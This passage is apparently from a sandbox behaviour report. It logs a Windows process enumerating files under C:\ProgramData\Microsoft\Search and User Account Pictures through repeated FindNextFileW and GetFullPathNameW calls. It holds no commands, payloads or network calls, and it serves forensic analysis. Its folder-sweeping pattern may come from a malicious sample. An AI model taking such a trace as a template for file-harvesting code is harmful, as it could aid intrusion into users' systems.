dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0138.737] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.737] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x299f0de0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x299f0de0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a16f40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0001.000", cAlternateFileName="")) returned 1 [0138.738] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a16f40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a16f40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a16f40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0001.001", cAlternateFileName="")) returned 1 [0138.738] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a16f40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a16f40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a16f40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0001.002", cAlternateFileName="")) returned 1 [0138.738] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a3d0a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0002.000", cAlternateFileName="")) returned 1 [0138.738] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a3d0a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0002.001", cAlternateFileName="")) returned 1 [0138.738] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a3d0a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0002.002", cAlternateFileName="")) returned 1 [0138.738] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x299cac80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x299cac80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x299f0de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAD0001.000", cAlternateFileName="")) returned 1 [0138.739] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x299cac80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x299cac80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x299cac80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAD0001.001", cAlternateFileName="")) returned 1 [0138.739] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x299cac80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x299cac80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x299cac80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAD0001.002", cAlternateFileName="")) returned 1 [0138.739] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2997e9c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2997e9c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x42291130, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="INDEX.000", cAlternateFileName="")) returned 1 [0138.739] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2997e9c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2997e9c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2997e9c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="INDEX.001", cAlternateFileName="")) returned 1 [0138.739] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2997e9c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2997e9c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2997e9c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="INDEX.002", cAlternateFileName="")) returned 1 [0138.740] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETTINGS.DIA", cAlternateFileName="")) returned 1 [0138.740] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETTINGS.DIA", cAlternateFileName="")) returned 0 [0138.741] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.741] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.741] CoTaskMemFree (pv=0x4e1c10) [0138.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.741] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap", lpFilePart=0x0) returned 0x56 [0138.742] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27edd3a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.742] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27eb7240, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiPT0000.000", cAlternateFileName="")) returned 1 [0138.742] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27edd3a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27f75920, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiPT0000.001", cAlternateFileName="")) returned 1 [0138.742] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27edd3a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27f75920, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiPT0000.002", cAlternateFileName="")) returned 1 [0138.742] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0138.743] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27edd3a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.743] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27eb7240, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiPT0000.000", cAlternateFileName="")) returned 1 [0138.743] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27edd3a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27f75920, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiPT0000.001", cAlternateFileName="")) returned 1 [0138.744] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27edd3a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27f75920, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiPT0000.002", cAlternateFileName="")) returned 1 [0138.744] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27edd3a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27f75920, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiPT0000.002", cAlternateFileName="")) returned 0 [0138.744] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.744] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.744] CoTaskMemFree (pv=0x4e1c10) [0138.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.745] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore", lpFilePart=0x0) returned 0x57 [0138.745] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.745] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x42291130, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiST0000.000", cAlternateFileName="")) returned 1 [0138.745] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x420c80b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiST0000.001", cAlternateFileName="")) returned 1 [0138.746] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x420c80b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiST0000.002", cAlternateFileName="")) returned 1 [0138.746] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0138.746] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.746] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x42291130, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiST0000.000", cAlternateFileName="")) returned 1 [0138.747] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x420c80b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiST0000.001", cAlternateFileName="")) returned 1 [0138.747] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x420c80b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiST0000.002", cAlternateFileName="")) returned 1 [0138.747] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x420c80b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiST0000.002", cAlternateFileName="")) returned 0 [0138.747] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.747] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.747] CoTaskMemFree (pv=0x4e1c10) [0138.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.748] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Search\\Data\\Temp", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Search\\Data\\Temp", lpFilePart=0x0) returned 0x29 [0138.748] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.749] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0138.749] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.749] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0138.750] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.750] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.750] CoTaskMemFree (pv=0x4e1c10) [0138.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.750] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\User Account Pictures", lpFilePart=0x0) returned 0x2e [0138.751] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x29423840, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29423840, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.751] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29423840, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29423840, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29423840, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz.dat", cAlternateFileName="5P5NRG~1.DAT")) returned 1 [0138.751] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80366a76, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80366a76, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 